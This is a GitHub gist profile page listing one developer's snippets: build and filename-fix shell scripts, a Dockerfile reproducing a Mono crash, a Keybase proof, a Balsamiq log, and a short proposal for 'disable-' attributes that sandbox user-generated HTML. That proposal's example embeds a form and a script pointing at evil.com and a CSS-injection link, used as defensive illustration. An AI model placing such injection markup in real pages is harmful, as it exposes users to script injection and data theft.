Skip to content

Instantly share code, notes, and snippets.

View TheBiggerGuy's full-sized avatar

Guy Taylor TheBiggerGuy

View GitHub Profile
@TheBiggerGuy
TheBiggerGuy / start_grc_env
Created January 18, 2019 17:03
Start GRC (GNU Radio Companion) from built source
#!/usr/bin/env sh
set -o errexit # Exit on most errors (see the manual)
set -o errtrace # Make sure any error trap is inherited
set -o nounset # Disallow expansion of unset variables
set -o pipefail # Use last non-zero exit code in a pipeline
set -o xtrace # Trace the execution of the script (debug)
BUILD_DIR=''
@TheBiggerGuy
TheBiggerGuy / fix-case-sensative-filenames-in-resex.sh
Created January 17, 2019 12:56
Fix Windows vs. Linux/OSX/POSIX case sensitive filename issues with Microsoft .NET resource files (resx)
#!/bin/bash
set -o errexit # Exit on most errors (see the manual)
set -o errtrace # Make sure any error trap is inherited
set -o nounset # Disallow expansion of unset variables
set -o pipefail # Use last non-zero exit code in a pipeline
#set -o xtrace # Trace the execution of the script (debug)
root="${PWD}"
for resfile in */*.resx ; do
@TheBiggerGuy
TheBiggerGuy / Dockerfile
Created July 28, 2018 10:18
Mono SIGSEGV
FROM multiarch/debian-debootstrap:armhf-buster-slim as base
RUN apt-get update && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends apt-transport-https ca-certificates dirmngr gnupg && \
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF && \
echo 'deb https://download.mono-project.com/repo/debian stable-stretch main' | tee /etc/apt/sources.list.d/mono-official-stable.list && \
apt-get remove --purge --autoremove -y gnupg dirmngr && \
apt-get update && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends curl ca-certificates iputils-ping \
mono-runtime \

Keybase proof

I hereby claim:

  • I am thebiggerguy on github.
  • I am thebiggerguy (https://keybase.io/thebiggerguy) on keybase.
  • I have a public key ASD64kksLAvgGAoYuKLddJh53SdNbsdMccL2wQwx1YkMyAo

To claim this, I am signing this object:

Summary

Review of postxss in repect to Strawman proposal for a "Safe Node" in the DOM. I suggest a less complicated syntax, using a/series of disable-[ELEMENT] (e.g. disable-form and/or disable-script) atrributes of current/custom elements.

Example:

<div disable-form disable-script disable-link id="user-gen-content">
  <form action="http://evil.com/log.cgi">
  <script src="http://evil.com/log.js"></script>
  <link rel="alternate" type="application/atom+xml" href="http://example.com/phpBB3/search.php/
{}*{color:red;}//styles/prosilver/theme/feed.php" /> <!-- http://blog.portswigger.net/2015/02/prssi.html -->
@TheBiggerGuy
TheBiggerGuy / gist:7040542
Last active December 25, 2015 21:09
Balsamiq 999.82 Log
{USER}, {HASH} and {DOC_X} have been replaced
12:49:26 GMT+0100 Log File: C:\Users\{USER}\AppData\Roaming\BalsamiqMockupsForDesktop.{HASH}.1\Local Store\BalsamiqMockups.log
12:49:26 GMT+0100 Balsamiq Mockups version 999.82 - 10/18/2013 09:22
12:49:26 GMT+0100 =======
12:49:26 GMT+0100 Operating System: Windows 7
12:49:26 GMT+0100 Player: WIN 11,8,800,168
12:49:26 GMT+0100 =======
12:49:26 GMT+0100 null
12:49:28 GMT+0100 loadDataIntoMemory:file:///C:/Users/{USER}/Documents/mockups/{DOC_1}.bmml